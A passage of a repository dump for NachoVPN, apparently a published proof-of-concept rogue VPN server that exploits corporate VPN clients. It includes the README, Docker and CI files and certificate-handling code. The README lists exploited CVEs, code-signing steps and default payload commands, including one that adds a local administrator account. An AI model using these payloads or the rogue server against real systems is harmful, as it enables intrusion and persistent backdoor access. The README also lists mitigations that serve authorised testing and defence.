Repository: AmberWolfCyber/NachoVPN
Branch: main
Commit: f1e891f8b1af
Files: 72
Total size: 410.4 KB
Directory structure:
gitextract_izup__0x/
├── .gitattributes
├── .github/
│ └── workflows/
│ └── build-docker.yml
├── .gitignore
├── Dockerfile
├── LICENSE
├── MANIFEST.in
├── README.md
├── docker-compose.yml
├── entrypoint.sh
├── requirements.txt
├── setup.py
└── src/
└── nachovpn/
├── __init__.py
├── core/
│ ├── __init__.py
│ ├── cert_manager.py
│ ├── db_manager.py
│ ├── ip_manager.py
│ ├── packet_handler.py
│ ├── plugin_manager.py
│ ├── request_handler.py
│ ├── smb_manager.py
│ └── utils.py
├── plugins/
│ ├── __init__.py
│ ├── base/
│ │ ├── __init__.py
│ │ ├── plugin.py
│ │ └── templates/
│ │ └── 404.html
│ ├── cisco/
│ │ ├── __init__.py
│ │ ├── files/
│ │ │ ├── OnConnect.sh
│ │ │ ├── OnConnect.vbs
│ │ │ └── OnDisconnect.vbs
│ │ ├── plugin.py
│ │ └── templates/
│ │ ├── login.xml
│ │ ├── prelogin.xml
│ │ └── profile.xml
│ ├── delinea/
│ │ ├── __init__.py
│ │ ├── plugin.py
│ │ └── templates/
│ │ ├── GetLauncherArguments.xml
│ │ ├── GetNextProtocolHandlerVersion.xml
│ │ ├── GetSymmetricKey.xml
│ │ ├── UpdateStatusV2.xml
│ │ └── index.html
│ ├── example/
│ │ ├── __init__.py
│ │ └── plugin.py
│ ├── netskope/
│ │ ├── __init__.py
│ │ ├── files/
│ │ │ └── STAgent.msi
│ │ ├── plugin.py
│ │ └── templates/
│ │ └── auth.html
│ ├── paloalto/
│ │ ├── __init__.py
│ │ ├── msi_downloader.py
│ │ ├── msi_patcher.py
│ │ ├── pkg_generator.py
│ │ ├── plugin.py
│ │ └── templates/
│ │ ├── getconfig.xml
│ │ ├── prelogin.xml
│ │ ├── pwresponse.xml
│ │ ├── sslvpn-login.xml
│ │ └── sslvpn-prelogin.xml
│ ├── pulse/
│ │ ├── __init__.py
│ │ ├── config_generator.py
│ │ ├── config_parser.py
│ │ ├── funk_parser.py
│ │ ├── plugin.py
│ │ └── test/
│ │ ├── example_rules.json
│ │ └── test_policy.py
│ └── sonicwall/
│ ├── __init__.py
│ ├── files/
│ │ └── NACAgent.c
│ ├── plugin.py
│ └── templates/
│ ├── launchextender.html
│ ├── launchplatform.html
│ ├── logout.html
│ ├── welcome.html
│ └── wxacneg.html
└── server.py
================================================
FILE CONTENTS
================================================
================================================
FILE: .gitattributes
================================================
* text=auto
*.sh text eol=lf
================================================
FILE: .github/workflows/build-docker.yml
================================================
# CI workflow: build the Docker image and push it to the GitHub Container
# Registry (GHCR), tagged with the branch name and 'latest'.
name: Docker Build

# Only pushes to the 'release' branch trigger a build.
on:
  push:
    branches: ['release']

env:
  REGISTRY: ghcr.io
  IMAGE_NAME: ${{ github.repository }}

jobs:
  build-and-push-image:
    runs-on: ubuntu-latest
    permissions:
      contents: read
      packages: write       # required to push images to GHCR
      attestations: write
      id-token: write
    steps:
      - name: Checkout repository
        uses: actions/checkout@v4
      # Third-party docker/* actions below are pinned to commit SHAs
      # (supply-chain hardening); the corresponding version tags are not
      # recorded here -- TODO confirm before bumping.
      - name: Log in to the Container registry
        uses: docker/login-action@65b78e6e13532edd9afa3aa52ac7964289d1a9c1
        with:
          registry: ${{ env.REGISTRY }}
          username: ${{ github.actor }}
          password: ${{ secrets.GITHUB_TOKEN }}
      - name: Extract metadata (tags, labels) for Docker
        id: meta
        uses: docker/metadata-action@9ec57ed1fcdbf14dcef7dfbe97b2010124a938b7
        with:
          images: ${{ env.REGISTRY }}/${{ env.IMAGE_NAME }}
          # Tag with the branch name (e.g. 'release') plus a literal 'latest'
          tags: |
            type=ref,event=branch
            type=raw,value=latest
      - name: Build and push Docker image
        id: push
        uses: docker/build-push-action@f2a1d5e99d037542a71f64918e516c093c6f3fc4
        with:
          context: .
          push: true
          tags: ${{ steps.meta.outputs.tags }}
          labels: ${{ steps.meta.outputs.labels }}
================================================
FILE: .gitignore
================================================
# Ignore virtual environment directories
env/
venv/
# Ignore environment files
.env
# Ignore compiled Python files
*.pyc
__pycache__/
# Ignore log files and debugging artifacts
*.log
# Ignore coverage reports
.coverage
.coverage.*
htmlcov/
*.cover
# Ignore cache files and directories
*.egg-info/
.eggs/
*.egg
*.pyo
*.pyd
*.pdb
.cache/
*.pytest_cache/
*.zip
# Ignore distribution files
dist/
build/
*.wheel
# Ignore project-specific runtime directories (certificates, payloads, captures)
certs/
downloads/
payloads/
pcaps/
# Ignore testing artifacts
.tox/
.nox/
.pytest_cache/
# Ignore IDE/project-specific files
.vscode/
.idea/
*.iml
# Ignore database files
*.sqlite3
*.db
# Ignore temporary files
*.tmp
*.swp
*.swo
*.bak
*.orig
.DS_Store
================================================
FILE: Dockerfile
================================================
# NachoVPN server image, based on Ubuntu 22.04 (jammy).
FROM ubuntu:jammy

WORKDIR /app

# Skip .pyc files and keep Python output unbuffered (container-friendly logging)
ENV PYTHONDONTWRITEBYTECODE=1
ENV PYTHONUNBUFFERED=1

# System dependencies:
#   gcc/libffi-dev/libssl-dev        - building Python C extensions
#   osslsigncode/msitools/mingw-w64  - building and signing Windows payloads
#   python3-nftables/nftables        - packet forwarding for VPN tunnels
RUN apt-get update && apt-get install -y --no-install-recommends \
    gcc \
    libffi-dev \
    libssl-dev \
    osslsigncode \
    msitools \
    mingw-w64 \
    gcc-mingw-w64 \
    python3 \
    python3-pip \
    python-is-python3 \
    python3-nftables \
    nftables \
    && apt-get clean && rm -rf /var/lib/apt/lists/*

COPY setup.py .
COPY MANIFEST.in .
COPY requirements.txt .
COPY src/ src/

RUN pip install --no-cache-dir -r requirements.txt
# certbot is invoked by entrypoint.sh to obtain a TLS certificate
RUN pip install --no-cache-dir certbot
# Build the nachovpn wheel from source and install it
RUN python setup.py sdist bdist_wheel
RUN pip install --no-cache-dir dist/*.whl

# 80: HTTP (ACME http-01 challenges); 443: HTTPS VPN endpoints
EXPOSE 80
EXPOSE 443

COPY entrypoint.sh .
RUN chmod +x entrypoint.sh
ENTRYPOINT ["/bin/bash", "-c", "./entrypoint.sh"]
================================================
FILE: LICENSE
================================================
MIT License
Copyright (c) 2024 AmberWolf Ltd.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
================================================
FILE: MANIFEST.in
================================================
recursive-include src/nachovpn/plugins **/templates/*
recursive-include src/nachovpn/plugins **/files/*
================================================
FILE: README.md
================================================
# NachoVPN 🌮🔒
NachoVPN is a Proof of Concept that demonstrates exploitation of SSL-VPN clients, using a rogue VPN server.
It uses a plugin-based architecture so that support for additional SSL-VPN products can be contributed by the community. It currently supports various popular corporate VPN products, such as Cisco AnyConnect, SonicWall NetExtender, Palo Alto GlobalProtect, and Ivanti Connect Secure.
For further details, see our [blog post](https://blog.amberwolf.com/blog/2024/november/introducing-nachovpn---one-vpn-server-to-pwn-them-all/), and HackFest Hollywood 2024 presentation [[slides](https://github.com/AmberWolfCyber/presentations/blob/main/2024/Very%20Pwnable%20Networks%20-%20HackFest%20Hollywood%202024.pdf)|[video](https://www.youtube.com/watch?v=-MZfkmcZRVg)].
## Installation
### Prerequisites
* Python 3.9 or later
* Docker (optional)
* osslsigncode (Linux only)
* msitools (Linux only)
* python3-nftables (Linux only)
* git
### Linux Setup
NachoVPN is built and tested on Ubuntu 22.04.
* Install `python3-nftables` and `nftables`
* Optionally use `setcap` to avoid `sudo` requirement:
```bash
sudo setcap 'cap_net_raw,cap_net_bind_service,cap_net_admin=eip' /usr/bin/python3.10
```
* Enable IP forwarding:
```bash
sudo sysctl -w net.ipv4.ip_forward=1
```
### Installing from source
NachoVPN can be installed from GitHub using pip. Note that this requires git to be installed.
First, create a virtual environment.
On Linux, ensure that the virtual env has access to the system `site-packages`, so that `nftables` works:
```bash
python3 -m venv env --system-site-packages
source env/bin/activate
```
On Windows, nftables (and thus packet forwarding) is disabled, so use:
```bash
python -m venv env
.\env\Scripts\activate
```
Then, install NachoVPN:
```bash
pip install git+https://github.com/AmberWolfCyber/NachoVPN.git
```
If you prefer to use Docker, then you can pull the container from the GitHub Container Registry:
```bash
docker pull ghcr.io/amberwolfcyber/nachovpn:release
```
## Building for distribution
### Building a wheel file
First, clone this repository, and install `setuptools` and `wheel` via pip. You can then run the `setup.py` script:
```bash
git clone https://github.com/AmberWolfCyber/NachoVPN
pip install -U setuptools wheel
python setup.py bdist_wheel
```
This will generate a wheel file in the `dist` directory, which can be installed with pip:
```bash
pip install dist/nachovpn-1.0.0-py3-none-any.whl
```
### Building for local development
Alternatively, for local development you can install the package in editable mode using:
```bash
pip install -e .
```
### Building a container image
You can build the container image with the following command:
```bash
docker build -t nachovpn:latest .
```
## Running
To run the server as standalone, use:
```
python -m nachovpn.server
```
Alternatively, you can run the server using Docker:
```bash
docker run -e SERVER_FQDN=connect.nachovpn.local -e EXTERNAL_IP=1.2.3.4 -v ./certs:/app/certs -p 80:80 -p 443:443 --rm -it nachovpn
```
This will generate a certificate for the `SERVER_FQDN` using certbot, and save it to the `certs` directory, which we've mounted into the container.
Alternatively, for testing purposes, you can skip the certificate generation by setting the `SKIP_CERTBOT` environment variable.
This will generate a self-signed certificate instead.
```bash
docker run -e SERVER_FQDN=connect.nachovpn.local -e SKIP_CERTBOT=1 -e EXTERNAL_IP=1.2.3.4 -p 443:443 --rm -it nachovpn
```
An example [docker-compose file](docker-compose.yml) is also provided for convenience.
### Debugging
You can run `nachovpn` with the `-d` or `--debug` command line arguments in order to increase the verbosity of logging, which can aid in debugging.
Alternatively, if the logging is too noisy, you can use the `-q` or `--quiet` command line argument instead.
### Plugins
NachoVPN supports the following plugins and capabilities:
| Plugin | Product | CVE | Windows RCE | macOS RCE | Privileged | URI Handler | Packet Capture | Demo |
| -------- | ----------- | -------- | -------- | -------- | -------- | -------- | -------- | ---- |
| Cisco | Cisco AnyConnect | N/A | ✅ | ✅ | ❌ | ❌ | ✅ | [Windows](https://vimeo.com/1024773762) / [macOS](https://vimeo.com/1024773668) |
| SonicWall | SonicWall NetExtender | [CVE-2024-29014](https://blog.amberwolf.com/blog/2024/november/sonicwall-netextender-for-windows---rce-as-system-via-epc-client-update-cve-2024-29014/) | ✅ | ❌ | ✅ | ✅ | ❌ | [Windows](https://vimeo.com/1024774407) |
| PaloAlto | Palo Alto GlobalProtect | [CVE-2024-5921](https://blog.amberwolf.com/blog/2024/november/palo-alto-globalprotect---code-execution-and-privilege-escalation-via-malicious-vpn-server-cve-2024-5921/) [(partial fix)](https://blog.amberwolf.com/blog/2025/august/nachovpn-update---palo-alto-globalprotect/) | ✅ | ✅ | ✅ | ❌ | ✅ | [Windows](https://vimeo.com/1024774239) / [macOS](https://vimeo.com/1024773987) / [iOS](https://vimeo.com/1024773956) |
| PulseSecure | Ivanti Connect Secure | [CVE-2020-8241 (bypassed)](https://blog.amberwolf.com/blog/2025/july/nachovpn-update---ivanti-connect-secure/) | ✅ | ✅ | ✅ | ✅ (Windows only - disabled by default in [22.8R1](https://help.ivanti.com/ps/help/en_US/ISAC/22.X/rn-22.X/noteworthy-information.htm)) | ✅ | [Windows](https://vimeo.com/1024773914) |
| Netskope | Netskope | [CVE-2025-0309](https://blog.amberwolf.com/blog/2025/august/advisory---netskope-client-for-windows---local-privilege-escalation-via-rogue-server/) | ✅ | ❌ | ✅ | ❌ | ❌ | [Windows](https://vimeo.com/1114191607) |
| Delinea | Protocol Handler | [CVE-2026-????](https://blog.amberwolf.com/blog/2026/february/delinea-protocol-handler---return-of-the-msi/) | ✅ | ✅ | ❌ | ✅ | ❌ | [Windows](https://vimeo.com/1168821295) |
#### URI handlers
* The Ivanti Connect Secure (Pulse Secure) URI handler can be triggered by visiting the `/pulse` URL on the NachoVPN server.
* The SonicWall NetExtender URI handler can be triggered by visiting the `/sonicwall` URL on the NachoVPN server. This requires that the SonicWall Connect Agent is installed on the client machine.
* The Delinea URI handler can be triggered by visiting the `/delinea` URL on the NachoVPN server.
#### Operating Notes
* It is recommended to use a TLS certificate that is signed by a trusted Certificate Authority. The docker container automates this process for you, using certbot. If you do not use a trusted certificate, then NachoVPN will generate a self-signed certificate instead, which in most cases will either cause the client to prompt with a certificate warning, or it will refuse to connect unless you modify the client settings to accept self-signed certificates. For the Palo Alto GlobalProtect plugin, this will also cause the MSI installer to fail.
* In order to simulate a valid codesigning certificate for the SonicWall plugin, NachoVPN will sign the `NACAgent.exe` payload with a self-signed certificate. For testing purposes, you can download and install this CA certificate from `/sonicwall/ca.crt` before triggering the exploit. For production use-cases, you will need to obtain a valid codesigning certificate from a public CA, sign your `NACAgent.exe` payload, and place it in the `payloads` directory (or volume mount it into `/app/payloads`, if using docker).
* For convenience, a default `NACAgent.exe` payload is generated for the SonicWall plugin, and written to the `payloads` directory. This simply spawns a new `cmd.exe` process on the current user's desktop, running as `SYSTEM`.
* The Palo Alto GlobalProtect plugin requires that the MSI installers and `msi_version.txt` file are present in the `downloads` directory. Either add these manually, or run the `msi_downloader.py` script to download them.
* To perform the Palo Alto GlobalProtect downgrade attack, ensure that the `GlobalProtect.msi.old` and `GlobalProtect64.msi.old` are present in the `downloads` folder. These files should contain the *unmodified* MSI installers for a version *prior* to 6.2.6 (e.g. 6.2.5).
#### Disabling a plugin
To disable a plugin, add it to the `DISABLED_PLUGINS` environment variable. For example:
```bash
DISABLED_PLUGINS=CiscoPlugin,SonicWallPlugin
```
### Environment Variables
NachoVPN is configured using environment variables. This makes it easily compatible with containerised deployments.
Global environment variables:
| Variable | Description | Default |
| -------- | ----------- | ------- |
| `SERVER_FQDN` | The fully qualified domain name of the server. | `connect.nachovpn.local` |
| `EXTERNAL_IP` | The external IP address of the server. | `127.0.0.1` |
| `WRITE_PCAP` | Whether to write captured PCAP files to disk. | `false` |
| `DISABLED_PLUGINS` | A comma-separated list of plugins to disable. | |
| `USE_DYNAMIC_SERVER_THUMBPRINT` | Whether to calculate the server certificate thumbprint dynamically from the server (useful if behind a proxy). | `false` |
| `SERVER_SHA1_THUMBPRINT` | Allows overriding the calculated SHA1 thumbprint for the server certificate. | |
| `SERVER_MD5_THUMBPRINT` | Allows overriding the calculated MD5 thumbprint for the server certificate. | |
| `SMB_ENABLED` | Enables the SMB share, available via the tunnel at `\\10.10.0.1\` | `false` |
| `SMB_SHARE_NAME` | The name to use for the SMB share | `SHARE` |
| `SMB_SHARE_PATH` | The path to the directory to use for the SMB share | `smb` |
| `TUNNEL_PRIVATE` | When set to `true`, enables tunneling but disables internet forwarding for VPN clients. Clients can only access the SMB share. | `false` |
| `TUNNEL_FULL` | When set to `true`, enables full tunneling and allows VPN clients to access the internet. Also implies `TUNNEL_PRIVATE=true`. | `false` |
Plugin specific environment variables:
| Variable | Description | Default |
| -------- | ----------- | ------- |
| `VPN_NAME` | The name of the VPN profile, which is presented to the client for Cisco AnyConnect. | `NachoVPN` |
| `PULSE_LOGON_SCRIPT` | The path to the Pulse Secure logon script. | `C:\Windows\System32\calc.exe` |
| `PULSE_LOGON_SCRIPT_MACOS` | The path to the Pulse Secure logon script for macOS. | |
| `PULSE_DNS_SUFFIX` | The DNS suffix to be used for Pulse Secure connections. | `nachovpn.local` |
| `PULSE_USERNAME` | The username to be pre-filled in the Pulse Secure logon dialog. | |
| `PULSE_SAVE_CONNECTION` | Whether to save the Pulse Secure connection in the user's client. | `false` |
| `PULSE_ANONYMOUS_AUTH` | Whether to use anonymous authentication for Pulse Secure connections. If set to `true`, the user will not be prompted for a username or password. | `false` |
| `PULSE_HOST_CHECKER_RULES_FILE` | A JSON file containing a list of registry-based host-checker rules for ICS. See example in `src/nachovpn/plugins/pulse/test/example_rules.json` | |
| `PALO_ALTO_MSI_ADD_FILE` | The path to a file to be added to the Palo Alto installer MSI. | |
| `PALO_ALTO_MSI_COMMAND` | The command to be executed by the Palo Alto installer MSI. | `net user pwnd Passw0rd123! /add && net localgroup administrators pwnd /add` |
| `PALO_ALTO_FORCE_PATCH` | Whether to force the patching of the MSI installer if it already exists in the payloads directory. | `false` |
| `PALO_ALTO_PKG_COMMAND` | The command to be executed by the Palo Alto installer PKG on macOS. | `touch /tmp/pwnd` |
| `CISCO_COMMAND_WIN` | The command to be executed by the Cisco AnyConnect OnConnect.vbs script on Windows. | `calc.exe` |
| `CISCO_COMMAND_MACOS` | The command to be executed by the Cisco AnyConnect OnConnect.sh script on macOS. | `touch /tmp/pwnd` |
## Mitigations
We recommend the following mitigations:
* Ensure SSL-VPN clients are updated to the latest version available from the vendor.
* Most VPN clients support the concept of locking down the VPN profile to a specific endpoint, or using an always-on VPN mode. This should be enabled where possible.
* Unfortunately, in some cases this lockdown can be removed by a malicious local user, therefore it is also recommended to use host-based firewall rules to restrict the IP addresses that the VPN client can communicate with.
* Consider using an Application Control policy, such as WDAC, or an EDR solution to ensure that only approved executables and scripts can be executed by the VPN client.
* Detect and alert on VPN clients executing non-standard child processes.
## References
* [AmberWolf Blog: NachoVPN](https://blog.amberwolf.com/blog/2024/november/introducing-nachovpn---one-vpn-server-to-pwn-them-all/)
* [HackFest Hollywood 2024: Very Pwnable Networks: Exploiting the Top Corporate VPN Clients for Remote Root and SYSTEM Shells, Rich Warren & David Cash](https://github.com/AmberWolfCyber/presentations/blob/main/2024/Very%20Pwnable%20Networks%20-%20HackFest%20Hollywood%202024.pdf) [[video](https://www.youtube.com/watch?v=-MZfkmcZRVg)]
* [BlackHat 2008: Leveraging the Edge: Abusing SSL VPNs, Mike Zusman](https://www.blackhat.com/presentations/bh-usa-08/Zusman/BH_US_08_Zusman_SSL_VPN_Abuse.pdf)
* [BlackHat 2019: Infiltrating Corporate Intranet Like NSA, Orange Tsai & Meh Chang](https://i.blackhat.com/USA-19/Wednesday/us-19-Tsai-Infiltrating-Corporate-Intranet-Like-NSA.pdf)
* [NCC Group: Making New Connections: Leveraging Cisco AnyConnect Client to Drop and Run Payloads, David Cash & Julian Storr](https://www.nccgroup.com/uk/research-blog/making-new-connections-leveraging-cisco-anyconnect-client-to-drop-and-run-payloads/)
* [The OpenConnect Project](https://www.infradead.org/openconnect/)
## Contributing
We welcome contributions! Please open an issue or raise a Pull Request.
If you're interested in developing a new plugin, you can take a look at the [ExamplePlugin](src/nachovpn/plugins/example/plugin.py) to get started.
## License
NachoVPN is licensed under the MIT license. See the [LICENSE](LICENSE) file for details.
================================================
FILE: docker-compose.yml
================================================
# Docker Compose definition for running the NachoVPN server.
# Fix: the ./payloads volume mount was listed twice; the duplicate is removed.
services:
  nachovpn:
    container_name: nachovpn
    build:
      context: .
      dockerfile: Dockerfile
    restart: unless-stopped
    ports:
      - "443:443"
      - "80:80"
    volumes:
      # TLS certificates (certbot output or self-signed)
      - ./certs/:/app/certs/
      # Generated/custom payloads (e.g. NACAgent.exe)
      - ./payloads/:/app/payloads/
      # Vendor installers (e.g. GlobalProtect MSIs)
      - ./downloads/:/app/downloads/
    environment:
      - SERVER_FQDN=${SERVER_FQDN:-}
      - EXTERNAL_IP=${EXTERNAL_IP:-}
      - SKIP_CERTBOT=${SKIP_CERTBOT:-}
    networks:
      - backend

networks:
  backend:
================================================
FILE: entrypoint.sh
================================================
#!/bin/bash
# Container entrypoint: obtain a TLS certificate via certbot (unless skipped
# or already present), assemble server CLI arguments from the environment,
# then exec the NachoVPN server.

# Validation of SERVER_FQDN / EXTERNAL_IP is currently disabled:
#if [[ -z "${SERVER_FQDN}" ]]; then
#    echo "Error: SERVER_FQDN is not set or is empty"
#    exit 1
#fi
#if [[ -z "${EXTERNAL_IP}" ]]; then
#    echo "Error: EXTERNAL_IP is not set or is empty"
#    exit 1
#fi

CERT_PATH="/app/certs/server-dns.crt"
KEY_PATH="/app/certs/server-dns.key"

if [[ -n "${SKIP_CERTBOT}" ]]; then
    echo "SKIP_CERTBOT is set. Skipping Certbot execution."
elif [[ -n "${WEBSITE_HOSTNAME}" ]]; then
    # WEBSITE_HOSTNAME implies a managed hosting environment that terminates
    # TLS in front of us (see --no-tls below) -- no certificate needed here.
    echo "WEBSITE_HOSTNAME is set. Skipping Certbot execution."
elif [[ -f "$CERT_PATH" && -f "$KEY_PATH" ]]; then
    echo "Certificate and key already exist. Skipping Certbot execution."
else
    # Request a certificate from Let's Encrypt.
    # Test certbot's exit status directly rather than via $? so an
    # intervening command cannot clobber the status we check.
    if certbot certonly \
        --standalone \
        --preferred-challenges http-01 \
        --register-unsafely-without-email \
        --agree-tos \
        --non-interactive \
        --no-eff-email \
        --domain "$SERVER_FQDN"; then
        echo "Certificate successfully generated."
        # Copy the certs to the paths expected by the server
        cp "/etc/letsencrypt/live/$SERVER_FQDN/fullchain.pem" "$CERT_PATH"
        cp "/etc/letsencrypt/live/$SERVER_FQDN/privkey.pem" "$KEY_PATH"
        echo "Certificate and key copied to:"
        echo "  Certificate: $CERT_PATH"
        echo "  Key: $KEY_PATH"
    else
        echo "Certbot failed to generate the certificate."
        exit 2
    fi
fi

# Build CLI arguments as an array so each flag/value expands as its own word
CLI_ARGS=()

# SERVER_PORT overrides the listen port; WEBSITE_HOSTNAME implies port 80
if [[ -n "${SERVER_PORT}" ]]; then
    CLI_ARGS+=(--port "$SERVER_PORT")
elif [[ -n "${WEBSITE_HOSTNAME}" ]]; then
    CLI_ARGS+=(--port 80)
fi

# DISABLE_TLS or WEBSITE_HOSTNAME implies TLS is handled upstream
if [[ -n "${DISABLE_TLS}" || -n "${WEBSITE_HOSTNAME}" ]]; then
    CLI_ARGS+=(--no-tls)
fi

echo "Starting nachovpn server with arguments: ${CLI_ARGS[*]}"
exec python -m nachovpn.server "${CLI_ARGS[@]}"
================================================
FILE: requirements.txt
================================================
blinker==1.7.0
certifi>=2024.2.2
cffi==1.16.0
charset-normalizer==3.3.2
click==8.1.7
colorama==0.4.6
cryptography==42.0.5
Flask==3.0.2
idna==3.6
itsdangerous==2.1.2
Jinja2==3.1.3
MarkupSafe==2.1.5
pycparser==2.21
requests==2.31.0
urllib3==2.2.1
Werkzeug==3.0.1
scapy==2.5.0
pycryptodome==3.20.0
pem==23.1.0
cabarchive==0.2.4
PyJWT==2.10.1
pyroute2==0.9.2
impacket==0.12.0
================================================
FILE: setup.py
================================================
from setuptools import setup, find_packages

# Packaging configuration for the nachovpn distribution.
setup(
    name="nachovpn",
    version="1.0.0",
    # src/ layout: packages are discovered under src/nachovpn
    package_dir={"": "src"},
    packages=find_packages(where="src"),
    # Bundle the template/file data declared in MANIFEST.in
    include_package_data=True,
    install_requires=[
        "cryptography==42.0.5",
        "jinja2>=3.0.0",
        "scapy>=2.5.0",
        "requests>=2.31.0",
        "flask>=3.0.2",
        "cabarchive>=0.2.4",
        "pycryptodome>=3.20.0",
        "PyJWT>=2.10.1",
        "pyroute2>=0.9.2",
    ],
    python_requires=">=3.9",
    description="A delicious, but malicious SSL-VPN server",
    # Installs a `nachovpn` console command that starts the server
    entry_points={
        "console_scripts": [
            "nachovpn=nachovpn.server:main",
        ],
    },
)
================================================
FILE: src/nachovpn/__init__.py
================================================
================================================
FILE: src/nachovpn/core/__init__.py
================================================
================================================
FILE: src/nachovpn/core/cert_manager.py
================================================
from cryptography import x509
from cryptography.x509.oid import NameOID, ExtendedKeyUsageOID, ObjectIdentifier
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import rsa, ec, padding
import logging
import datetime
import hashlib
import ipaddress
import socket
import certifi
import ssl
import os
class CertManager:
def __init__(self, cert_dir=os.path.join(os.getcwd(), 'certs'), ca_common_name="VPN Root CA"):
    """Initialise the certificate manager.

    Args:
        cert_dir: Directory where CA and server certificates/keys are stored.
            Created if missing. NOTE(review): the default is evaluated once at
            import time against the process CWD at that moment.
        ca_common_name: Common Name used for the self-signed root CA.
    """
    self.cert_dir = cert_dir
    os.makedirs(cert_dir, exist_ok=True)
    self.ca_common_name = ca_common_name
    # Populated by setup() with {'sha1': ..., 'md5': ...} of the DNS cert
    self.server_thumbprint = {}
    # Server identities; overridable via SERVER_FQDN / EXTERNAL_IP env vars
    self.dns_name = os.getenv('SERVER_FQDN', socket.gethostname())
    self.ip_address = os.getenv('EXTERNAL_IP', socket.gethostbyname(socket.gethostname()))
def setup(self):
    """Setup the certificates and load the SSL context.

    Order matters: the CA is loaded first because the server certificates
    are validated against it (cert_is_valid) and signed by it
    (generate_server_certificate).
    """
    self.load_ca_certificate()
    self.load_dns_certificate()
    self.load_ip_certificate()
    self.create_ssl_context()
    # server thumbprint is a dictionary with sha1 and md5 hashes of the DNS cert
    self.server_thumbprint = self.get_cert_thumbprint(self.dns_cert_path)
def create_ssl_context(self):
    """Create SSL context with SNI support and proper TLS configuration.

    The IP certificate is the default; when the client's SNI hostname equals
    our configured DNS name, the DNS certificate is served instead.

    Returns:
        The configured ssl.SSLContext (also stored on self.ssl_context).
    """
    self.ssl_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)

    def sni_callback(sslsocket, sni_name, sslcontext):
        # Invoked during the TLS handshake with the client's SNI value.
        try:
            if not sni_name:
                # No SNI sent: keep the default context (IP certificate)
                sslsocket.context = self.ssl_context
                return None
            logging.debug(f"SNI hostname requested: {sni_name}")
            # Create a new context for this connection
            ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
            if sni_name == self.dns_name:
                ctx.load_cert_chain(self.dns_cert_path, self.dns_key_path)
            else:
                # Unknown SNI names fall back to the IP certificate
                ctx.load_cert_chain(self.ip_cert_path, self.ip_key_path)
            # Set the new context
            sslsocket.context = ctx
        except Exception as e:
            # Swallow errors so a bad SNI value cannot raise out of the callback
            logging.error(f"Error in SNI callback: {e}")
        return None

    # Set the SNI callback
    self.ssl_context.sni_callback = sni_callback
    # Load default certificate (IP cert)
    self.ssl_context.load_cert_chain(
        certfile=self.ip_cert_path,
        keyfile=self.ip_key_path
    )
    return self.ssl_context
def load_ip_certificate(self):
    """Load or generate a certificate for the server's external IP address.

    Reuses the on-disk certificate when it is still valid for the IP,
    otherwise generates a fresh one signed by the local CA.

    Returns:
        Tuple of (cert_path, key_path).
    """
    # Fix: the filenames were needlessly written as f-strings
    self.ip_cert_path = os.path.join(self.cert_dir, "server-ip.crt")
    self.ip_key_path = os.path.join(self.cert_dir, "server-ip.key")
    if os.path.exists(self.ip_cert_path) and os.path.exists(self.ip_key_path) \
            and self.cert_is_valid(self.ip_cert_path, self.ip_address):
        logging.info(f"Using existing certificate for: {self.ip_address}")
        return self.ip_cert_path, self.ip_key_path
    logging.info(f"Generating new certificate for: {self.ip_address}")
    # 1.3.6.1.5.5.7.3.5 is the id-kp-ipsecEndSystem extended key usage OID;
    # the SAN also carries the DNS name so the cert works for either identity
    return self.generate_server_certificate(
        self.ip_cert_path, self.ip_key_path, self.ip_address,
        additional_ekus=[ObjectIdentifier('1.3.6.1.5.5.7.3.5')],
        additional_sans=[x509.IPAddress(ipaddress.IPv4Address(self.ip_address)),
                         x509.DNSName(self.dns_name)])
def load_dns_certificate(self):
    """Load or generate a certificate for the server's DNS name.

    This certificate may be volume mounted (e.g. when using certbot outside
    of the container), so an existing valid cert is never overwritten.

    Returns:
        Tuple of (cert_path, key_path).
    """
    # Fix: the filenames were needlessly written as f-strings
    self.dns_cert_path = os.path.join(self.cert_dir, "server-dns.crt")
    self.dns_key_path = os.path.join(self.cert_dir, "server-dns.key")
    if os.path.exists(self.dns_cert_path) and os.path.exists(self.dns_key_path) \
            and self.cert_is_valid(self.dns_cert_path, self.dns_name):
        logging.info(f"Using existing certificate for: {self.dns_name}")
        return self.dns_cert_path, self.dns_key_path
    logging.info(f"Generating new certificate for: {self.dns_name}")
    return self.generate_server_certificate(
        self.dns_cert_path, self.dns_key_path, self.dns_name,
        additional_sans=[x509.DNSName(self.dns_name)])
def load_ca_certificate(self):
    """Load the CA certificate and private key from disk, generating a new
    CA pair if either file is missing.

    Side effects: sets self.ca_cert_path / self.ca_key_path, and on a
    successful load also self.ca_cert / self.ca_key.

    Returns:
        Tuple of (ca_cert_path, ca_key_path).
    """
    self.ca_cert_path = os.path.join(self.cert_dir, 'ca.crt')
    self.ca_key_path = os.path.join(self.cert_dir, 'ca.key')
    # Guard clause: no CA material on disk yet -> create a fresh CA
    if not (os.path.exists(self.ca_cert_path) and os.path.exists(self.ca_key_path)):
        return self.generate_ca_certificate()
    with open(self.ca_cert_path, 'rb') as cert_file:
        self.ca_cert = x509.load_pem_x509_certificate(cert_file.read(), default_backend())
    with open(self.ca_key_path, 'rb') as key_file:
        self.ca_key = serialization.load_pem_private_key(key_file.read(), password=None, backend=default_backend())
    return self.ca_cert_path, self.ca_key_path
def cert_is_valid(self, cert_path, common_name):
    """Check if the certificate at cert_path is still usable for common_name.

    Returns False (causing the caller to re-generate the certificate) when it
    is expired, has the wrong Common Name, or claims issuance by our CA but
    fails signature verification against the currently loaded CA.
    """
